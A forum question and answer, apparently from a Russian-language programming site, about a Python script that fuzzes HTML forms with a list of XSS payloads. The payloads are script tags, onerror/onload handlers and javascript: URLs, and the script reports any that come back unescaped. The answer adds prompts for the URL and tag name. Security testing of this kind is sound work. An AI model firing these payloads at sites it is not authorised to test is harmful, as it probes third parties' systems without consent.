Python: парсинг для поиска XSS-уязвимостей с вводом URL и тега
Ниже приведён мой код для парсинга с целью поиска XSS-уязвимостей. Сейчас локальный хост и тег для проверки указаны прямо в программе. Как передать теги и атрибуты через input? Например: url_input = input("введите url:"), teg_input = input("введите тег:"), type_input = input("введите тип:")
import requests
from bs4 import BeautifulSoup
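def test_xss(url):
    """Probe every <form> on ``url`` for unescaped reflection of test strings.

    The page is fetched once. For each form, every named
    ``<input type="text">`` is filled with a probe string, hidden inputs keep
    the value the server sent, and the form is submitted with its declared
    method. A probe that comes back verbatim in the response body is
    reported.

    Verbatim reflection is a heuristic: it shows the value was echoed without
    output encoding, not that a browser would execute it, and it cannot see
    stored or DOM-based XSS. Other field types and ``<textarea>`` are not
    exercised. Treat a hit as a lead to confirm by hand and a clean run as
    inconclusive.

    Args:
        url: Address of the page whose forms are examined.

    Raises:
        requests.RequestException: If any request fails or times out.
    """
    # Function-scope import keeps this fix self-contained in the block.
    from urllib.parse import urljoin, urlsplit

    payloads = [
        '<form action="javascript:alert(\'XSS\')"><input type="submit"></form>',
        '<script>alert("XSS")</script>',
        '"><script>alert("XSS")</script>',
        '"><img src=x onerror=alert("XSS")>',
        'javascript:alert("XSS")',
        '<body onload=alert("XSS")>',
        '"><svg/onload=alert("XSS")>',
        '<iframe src="javascript:alert(\'XSS\');">',
        '\'"--><script>alert("XSS")</script>',
        '<img src="x" onerror="alert(\'XSS\')">',
        '<input type="text" value="<script>alert(\'XSS\')</script>">',
        # you can add as much as you want
    ]
    timeout = 10  # seconds; without it a stalled server blocks the run forever

    response = requests.get(url, timeout=timeout)
    soup = BeautifulSoup(response.text, 'html.parser')
    target_host = urlsplit(url).netloc.lower()
    found_xss = False

    for form in soup.find_all('form'):
        # urljoin copes with a missing action (submit to the page itself),
        # relative paths and absolute URLs; plain ``url + action`` raised
        # TypeError on a form without an action attribute.
        endpoint = urljoin(url, form.get('action') or '')
        if urlsplit(endpoint).netloc.lower() != target_host:
            # Keep probes on the host that was named as the target; this also
            # drops non-HTTP actions such as mailto: or javascript:.
            print(f'Skipped (outside target host): {endpoint}')
            continue
        method = form.get('method', 'get').lower()

        # Collect the submittable fields once per form, in document order.
        # A value of None marks a field that receives the probe string.
        fields = []
        for input_tag in form.find_all('input'):
            input_name = input_tag.get('name')
            if not input_name:
                continue  # an input without a name would become a None key
            input_type = input_tag.get('type', 'text').lower()
            if input_type == 'text':
                fields.append((input_name, None))
            elif input_type == 'hidden':
                fields.append((input_name, input_tag.get('value', '')))
        if all(value is not None for _, value in fields):
            # No field carries the probe, so a match in the response could
            # only be a coincidence.
            continue

        for payload in payloads:
            data = {
                name: payload if value is None else value
                for name, value in fields
            }
            if method == 'post':
                response = requests.post(endpoint, data=data, timeout=timeout)
            else:
                response = requests.get(endpoint, params=data, timeout=timeout)
            if payload in response.text:
                print(f'XSS found ({payload}): {endpoint}')
                found_xss = True
                break  # one hit per form is enough to flag it

    if not found_xss:
        print(f'XSS not found: {url}')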
# The scan is aimed at a development server on the local machine.
test_url = 'http://127.0.0.1:5000'
test_xss(url=test_url)
Ответы (1 шт):
Автор решения: Максимка
import re
import urllib.parse as up
import requests
from bs4 import BeautifulSoup
# Probe strings that test_xss() submits into text inputs. Each one is an
# alert()-style marker; test_xss() only checks whether the string comes back
# verbatim in the response body, so a hit indicates missing output encoding
# rather than confirmed script execution in a browser.
PAYLOADS = [
    '<form action="javascript:alert(\'XSS\')"><input type="submit"></form>',
    '<script>alert("XSS")</script>',
    '"><script>alert("XSS")</script>',
    '"><img src=x onerror=alert("XSS")>',
    'javascript:alert("XSS")',
    '<body onload=alert("XSS")>',
    '"><svg/onload=alert("XSS")>',
    '<iframe src="javascript:alert(\'XSS\');">',
    '\'"--><script>alert("XSS")</script>',
    '<img src="x" onerror="alert(\'XSS\')">',
    '<input type="text" value="<script>alert(\'XSS\')</script>">',
]
def build_full_url(base: str, action: str) -> str:
    """Resolve a form's ``action`` against the page address ``base``.

    A missing or empty ``action`` resolves to ``base`` itself. An absolute
    ``action`` replaces ``base`` entirely, host included, so the result may
    point at a different server than the page that was fetched.
    """
    if not action:
        return up.urljoin(base, "")
    return up.urljoin(base, action)
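def test_xss(url: str, tag_hint: str = "form") -> None:
    """Probe matching tags on ``url`` for unescaped reflection of PAYLOADS.

    The page is fetched once. Every tag named ``tag_hint`` is treated as a
    form: its named ``<input type="text">`` descendants are filled with a
    probe string, all other named inputs keep the value the server sent, and
    the request goes to the tag's resolved ``action`` with its declared
    method. A probe that comes back verbatim in the response is reported.

    Verbatim reflection is a heuristic: it shows the value was echoed without
    output encoding, not that a browser would execute it, and it cannot see
    stored or DOM-based XSS. ``<textarea>`` and non-text field types are not
    exercised. Treat a hit as a lead to confirm by hand and a clean run as
    inconclusive.

    Args:
        url: Page address; ``http://`` is prepended when no scheme is given.
        tag_hint: Tag name to look for, matched case-insensitively.
    """
    url = url.strip()
    # Compare the scheme case-insensitively so "HTTP://host" is not prefixed
    # a second time.
    if not url.lower().startswith(("http://", "https://")):
        url = "http://" + url
    tag_hint = tag_hint.strip() or "form"

    print(f"[+] Получение {url} …")
    try:
        resp = requests.get(url, timeout=10)
        resp.raise_for_status()
    except requests.RequestException as e:
        print(f"[!] Не удаётся найти {url}: {e}")
        return

    soup = BeautifulSoup(resp.text, "html.parser")
    # The hint comes straight from input(): escape it so regex metacharacters
    # cannot raise re.error, and anchor it so "a" does not match every tag
    # whose name merely contains an "a".
    tag_pattern = re.compile(rf"^{re.escape(tag_hint)}$", re.I)
    tags = soup.find_all(tag_pattern)
    if not tags:
        print(f"[!] Нет найденных тегов <{tag_hint}> .")
        return
    print(f"[+] Тег найден {len(tags)} <{tag_hint}> .")

    target_host = up.urlsplit(url).netloc.lower()
    found = False
    for tag in tags:
        action = build_full_url(url, tag.get("action"))
        if up.urlsplit(action).netloc.lower() != target_host:
            # An absolute action can name any server. Keep probes on the host
            # that was entered as the target; this also drops non-HTTP
            # actions such as mailto: or javascript:.
            print(f"[!] Пропуск {action}: адрес вне целевого хоста.")
            continue
        method = tag.get("method", "get").lower()

        # Collect the submittable fields once per tag, in document order.
        # A value of None marks a field that receives the probe string.
        fields = []
        for inp in tag.find_all("input"):
            name = inp.get("name")
            if not name:
                continue
            if inp.get("type", "text").lower() == "text":
                fields.append((name, None))
            else:
                fields.append((name, inp.get("value", "")))
        if all(value is not None for _, value in fields):
            # No field carries the probe, so a match in the response could
            # only be a coincidence.
            print(f"[!] В <{tag.name}> нет текстовых полей input — пропуск.")
            continue

        for payload in PAYLOADS:
            data = {
                name: payload if value is None else value
                for name, value in fields
            }
            try:
                if method == "post":
                    r = requests.post(action, data=data, timeout=10)
                else:
                    r = requests.get(action, params=data, timeout=10)
            except requests.RequestException as e:
                print(f"[!] Запрос не выполнен {action}: {e}")
                continue
            if payload in r.text:
                print(f"[+] XSS найдена! Загрузчик: {payload} @ {action}")
                found = True
                break  # one hit per tag is enough to flag it

    if not found:
        print("[-] Нет найденных загрузчиков.")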
# Read the target address and the tag name to inspect; an empty answer to the
# second prompt selects the default shown in brackets.
target = input("Enter URL: ").strip()
hint = input("Enter tag to fuzz inside (form / input / textarea …) [form]: ").strip() or "form"
test_xss(target, hint)